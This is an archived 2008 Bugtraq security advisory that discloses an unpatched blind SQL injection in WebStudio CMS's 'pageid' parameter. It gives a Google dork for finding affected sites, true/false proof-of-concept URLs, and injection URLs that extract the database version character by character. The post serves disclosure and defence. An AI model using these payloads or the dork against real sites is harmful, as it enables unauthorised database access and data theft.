lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200811242039.mAOKdkYX012427@www3.securityfocus.com>
Date: Mon, 24 Nov 2008 13:39:46 -0700
From: glafkos@...alavista.com
To: bugtraq@...urityfocus.com
Subject: WebStudio CMS 'pageid' Blind SQL Injection

Application:  WebStudio CMS

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type:     WebStudio CMS (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Introduction: WebStudio CMS is a modular Web Content Management System solution.

Google Dork:  "Powered by WebStudio"


Description:

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PoC:

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

Exploit:
 
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.


Credits:

Charalambous Glafkos
Email:  glafkos (at) astalavista (dot) com
___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ